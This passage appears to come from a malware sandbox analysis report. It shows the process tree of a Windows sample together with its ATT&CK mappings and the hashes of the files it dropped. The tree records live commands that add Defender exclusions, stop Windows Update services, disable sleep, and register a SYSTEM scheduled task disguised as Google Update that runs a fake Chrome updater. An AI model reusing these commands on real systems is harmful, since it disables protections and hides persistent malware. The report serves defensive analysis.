C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1568
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1592
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1596
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1620
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2992
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2832
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CBE94712-5A36-4159-A5B2-95316D682A63} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2576
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f3cd5c16233ee82e5be287976a2f2262
SHA1648cdee4b4194270861ef5dbb9c34b3ff706469f
SHA25633e161225610f8734120a42396e2f2f033019d9d4dc57725d7f45c00e8bdab09
SHA5121d81a59ff36a609d3858682ed6f6f61d7d4540708b76d183249a4960e77f90007e8d780c076398d2e7ebcd77bfa2131e226dca7c40dd4460177ccde700d37f63
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
Filesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
Filesize
9.9MB
MD580b0b41decb53a01e8c87def18400267
SHA1885f327c4e91065486137ca96105190f7a29d0f9
SHA25610d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA51219bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e
-
Filesize
9.9MB
MD580b0b41decb53a01e8c87def18400267
SHA1885f327c4e91065486137ca96105190f7a29d0f9
SHA25610d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA51219bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51b6e71dc9a30afb8ec6e1cc89aad6ace
SHA1d38b6b72d0a1231959d306df035d2a1d8edb9af3
SHA256e966fb6cdb67eeb23dc0a5285d7241ab8caf84ed1be63bb8153c142d3af346bf
SHA5125f500e2e4734b6cff31e0eb7bda7f41b60f9c9734f031b50214ee1dbed93dc698d98506b7463ceb538f9b807f4490c658ce73537af002154e4e0fa144da91a72
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VV4LD19JGK2CVVLR5233.temp
Filesize7KB
MD51b6e71dc9a30afb8ec6e1cc89aad6ace
SHA1d38b6b72d0a1231959d306df035d2a1d8edb9af3
SHA256e966fb6cdb67eeb23dc0a5285d7241ab8caf84ed1be63bb8153c142d3af346bf
SHA5125f500e2e4734b6cff31e0eb7bda7f41b60f9c9734f031b50214ee1dbed93dc698d98506b7463ceb538f9b807f4490c658ce73537af002154e4e0fa144da91a72
-
Filesize
2KB
MD52b19df2da3af86adf584efbddd0d31c0
SHA1f1738910789e169213611c033d83bc9577373686
SHA25658868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA5124a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.9MB
MD580b0b41decb53a01e8c87def18400267
SHA1885f327c4e91065486137ca96105190f7a29d0f9
SHA25610d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA51219bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379